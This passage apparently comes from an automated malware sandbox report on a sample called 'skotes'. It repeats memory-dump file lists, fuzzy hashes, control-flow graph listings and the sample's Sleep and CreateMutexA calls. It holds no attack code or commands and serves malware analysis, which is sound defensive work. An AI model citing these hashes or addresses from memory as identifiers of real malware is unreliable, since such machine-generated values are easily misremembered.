                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 1d470fff3dddac913e868bf1a54acad5e90cee07a08161d67e9f2fd45169a2c1
                                                                                                                • Instruction ID: cd64cd9b10db70c8bf768c5897df3d55a4cda01e037ef39e93271aecdcdafd65
                                                                                                                • Opcode Fuzzy Hash: 1d470fff3dddac913e868bf1a54acad5e90cee07a08161d67e9f2fd45169a2c1
                                                                                                                • Instruction Fuzzy Hash: 52314A31644100ABFB18FBB8DC8DB6DB761EBC5314F24821AE054DB2D6D73DA9808722

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 202 78a682-78a6a2 206 78a6d0-78a6ec 202->206 207 78a6a4-78a6b0 202->207 208 78a71a-78a739 206->208 209 78a6ee-78a6fa 206->209 210 78a6b2-78a6c0 207->210 211 78a6c6-78a6cd call 79d663 207->211 214 78a73b-78a747 208->214 215 78a767-78a916 call 7980c0 208->215 212 78a6fc-78a70a 209->212 213 78a710-78a717 call 79d663 209->213 210->211 216 78a949 210->216 211->206 212->213 212->216 213->208 221 78a749-78a757 214->221 222 78a75d-78a764 call 79d663 214->222 218 78a94e 216->218 219 78a949 call 7b6c6a 216->219 227 78a953-78a994 Sleep CreateMutexA 218->227 228 78a94e call 7b6c6a 218->228 219->218 221->216 221->222 222->215 234 78a996-78a998 227->234 235 78a9a7-78a9a8 227->235 228->227 234->235 236 78a99a-78a9a5 234->236 236->235
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 36c5567b3c56686936391e18360e621b308c4ecdbf802695c5de60a5c923211d
                                                                                                                • Instruction ID: ddeef9d74b2d668e7b9afdf7d1b65da40df286b3764d0bf47fa517f2d17dab1e
                                                                                                                • Opcode Fuzzy Hash: 36c5567b3c56686936391e18360e621b308c4ecdbf802695c5de60a5c923211d
                                                                                                                • Instruction Fuzzy Hash: 88312771644104ABFB18ABB8DC89B6DB772EB85310F24821AE014972D6D73DA9808762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 238 789adc-789ae8 239 789aea-789af8 238->239 240 789afe-789b27 call 79d663 238->240 239->240 241 78a917 239->241 247 789b29-789b35 240->247 248 789b55-789b57 240->248 243 78a953-78a994 Sleep CreateMutexA 241->243 244 78a917 call 7b6c6a 241->244 254 78a996-78a998 243->254 255 78a9a7-78a9a8 243->255 244->243 250 789b4b-789b52 call 79d663 247->250 251 789b37-789b45 247->251 252 789b59-78a916 call 7980c0 248->252 253 789b65-789d91 call 797a00 call 785c10 call 788b30 call 798220 call 797a00 call 785c10 call 788b30 call 798220 248->253 250->248 251->241 251->250 254->255 256 78a99a-78a9a5 254->256 256->255
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 3ede7c9beafa654ee2bae42cb48b56160ebca2176a5d7fc82a7c1a360d5f1861
                                                                                                                • Instruction ID: 0b20ce23f0192fb179ed40a2a6c04c0eaa00e23be290a2aba6b55bf1369c2945
                                                                                                                • Opcode Fuzzy Hash: 3ede7c9beafa654ee2bae42cb48b56160ebca2176a5d7fc82a7c1a360d5f1861
                                                                                                                • Instruction Fuzzy Hash: A2213A71644200ABFB18BBACECC976DB765EBC5310F24822EE544C72D1D77DA9408712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 315 78a856-78a86e 316 78a89c-78a89e 315->316 317 78a870-78a87c 315->317 320 78a8a9-78a8b1 call 787d30 316->320 321 78a8a0-78a8a7 316->321 318 78a87e-78a88c 317->318 319 78a892-78a899 call 79d663 317->319 318->319 322 78a94e 318->322 319->316 332 78a8b3-78a8bb call 787d30 320->332 333 78a8e4-78a8e6 320->333 324 78a8eb-78a916 call 7980c0 321->324 329 78a953-78a987 Sleep CreateMutexA 322->329 330 78a94e call 7b6c6a 322->330 335 78a98e-78a994 329->335 330->329 332->333 340 78a8bd-78a8c5 call 787d30 332->340 333->324 337 78a996-78a998 335->337 338 78a9a7-78a9a8 335->338 337->338 339 78a99a-78a9a5 337->339 339->338 340->333 344 78a8c7-78a8cf call 787d30 340->344 344->333 347 78a8d1-78a8d9 call 787d30 344->347 347->333 350 78a8db-78a8e2 347->350 350->324
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 537e4e25eb2d33c599f345f7602e1e718a3e8c4610dc175c6c5f88858b28c275
                                                                                                                • Instruction ID: 1e1703121da7f59fb4fe27157332e3ac8792e45e4d1fd6e801a9fd1520006876
                                                                                                                • Opcode Fuzzy Hash: 537e4e25eb2d33c599f345f7602e1e718a3e8c4610dc175c6c5f88858b28c275
                                                                                                                • Instruction Fuzzy Hash: CC212B713C9100EAFB2977AC988EB2DB7619F91300F24441BE144D72D1DA7EA9818373

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 292 78a34f-78a35b 293 78a35d-78a36b 292->293 294 78a371-78a39a call 79d663 292->294 293->294 295 78a93a 293->295 300 78a3c8-78a916 call 7980c0 294->300 301 78a39c-78a3a8 294->301 298 78a953-78a994 Sleep CreateMutexA 295->298 299 78a93a call 7b6c6a 295->299 308 78a996-78a998 298->308 309 78a9a7-78a9a8 298->309 299->298 302 78a3aa-78a3b8 301->302 303 78a3be-78a3c5 call 79d663 301->303 302->295 302->303 303->300 308->309 310 78a99a-78a9a5 308->310 310->309
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: c43d4e9616fb0b0c2c8efa36f5d99a14b4bab49597b3d632fa254a9a2a4e3503
                                                                                                                • Instruction ID: edaab5dd49f20d553eaba519f6532e4126a18b391a78922b5b0b0e6e7c2e27a9
                                                                                                                • Opcode Fuzzy Hash: c43d4e9616fb0b0c2c8efa36f5d99a14b4bab49597b3d632fa254a9a2a4e3503
                                                                                                                • Instruction Fuzzy Hash: 27213D31684200ABFB18BB6CEC8976DB775DBD5310F24812EE444D76D1D77EA5808352

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
